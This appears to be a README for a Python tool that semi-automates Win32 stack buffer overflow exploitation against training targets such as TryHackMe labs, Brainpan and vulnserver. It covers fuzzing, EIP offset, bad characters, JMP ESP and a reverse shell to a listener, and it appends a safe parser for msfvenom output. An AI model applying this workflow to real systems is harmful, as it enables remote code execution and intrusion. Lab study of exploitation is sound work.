A Python-based semi-automatic buffer overflow exploit script
Step 1 - Edit the code and add the remote address, remote port, command, listener IP and port.
#Server response timeout, will be used to identify a crash.
timeout = 5
#Add vulnerable server's IP address and port to connect
addr = ('<IP address>',<PORT>)
#Add the command to send, prepended to the buffer, e.g. 'TRUN .' for vulnserver.exe
cmd = "<COMMAND>"
Run -> python semi-win32.py fuzz
Step 2 - Follow the on-screen instructions and run mona to find the offset
Update the correct EIP offset in the code
#Default starting EIP offset is 50, change to correct EIP offset after fuzz step
offset = 50
Run -> python semi-win32.py badchars
Update the bad characters in the code as you find them, and re-run until mona shows no modified characters
#Add bad characters to the list as you find them
bad = "\x00"
Step 3 - Set the 'JMP ESP' address in the code
#Set the JMP ESP address below before running 'shell'
esp = ""
Make sure your listener is running and run -> python semi-win32.py shell
Tested on TryHackMe labs - https://tryhackme.com/room/bufferoverflowprep - Thanks to Tib3rius
Tested on Brainpan.exe
Tested on vulnserver.exe (spiking done separately)
Please ignore the warning below; it's because I used 'import' inside a function. It's just a dirty way to read the shellcode generated by msfvenom.
semi-win32.py:97: SyntaxWarning: import * only allowed at module level
def shellcode(addr,cmd,lhost,lport,j,esp,timeout):
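The warning comes from doing a wildcard import inside a function to pull in the `buf` variable that msfvenom's `-f python` output defines. A cleaner way to get the same bytes, added here as an example and not code from semi-win32.py, is to parse that file directly: accept only `buf = b"..."` / `buf += b"..."` lines, decode each byte literal with `ast.literal_eval`, and reject anything else, so no code from the file is ever executed. The sample file contents and the `load_shellcode` name are constructed for this example.

```python
import ast
import os
import re
import tempfile

# Constructed sample of the shape msfvenom -f python produces; the bytes here
# are filler (NOPs and an int3), not a payload.
SAMPLE_MSFVENOM_OUTPUT = '''buf =  b""
buf += b"\\x90\\x90\\x90\\x90"
buf += b"\\xcc"
'''

# One assignment or append of a bytes literal per line; nothing else is allowed.
_LINE_RE = re.compile(r'^\s*buf\s*(\+?=)\s*(b"(?:[^"\\]|\\.)*")\s*$')


def load_shellcode(path):
    """Return the bytes defined by a msfvenom -f python file.

    Each line is matched against _LINE_RE and its literal is decoded with
    ast.literal_eval, which only evaluates constant literals, so the file is
    never imported or exec'd. A line that is not a bytes assignment raises
    ValueError with the offending line number.
    """
    buf = b""
    with open(path, "r") as fh:
        for lineno, line in enumerate(fh, 1):
            if not line.strip():
                continue
            m = _LINE_RE.match(line)
            if not m:
                raise ValueError(f"{path}:{lineno}: unexpected line {line!r}")
            op, literal = m.groups()
            chunk = ast.literal_eval(literal)
            buf = chunk if op == "=" else buf + chunk
    return buf


def demo():
    """Write the constructed sample to a temp file and load it."""
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as fh:
        fh.write(SAMPLE_MSFVENOM_OUTPUT)
        path = fh.name
    try:
        return load_shellcode(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo().hex())  # 9090909090cc minus one nop: 90909090cc
```

With this in place the generated file can live next to the script and be read at module level, and the `import *` inside `shellcode()` (and the SyntaxWarning) goes away.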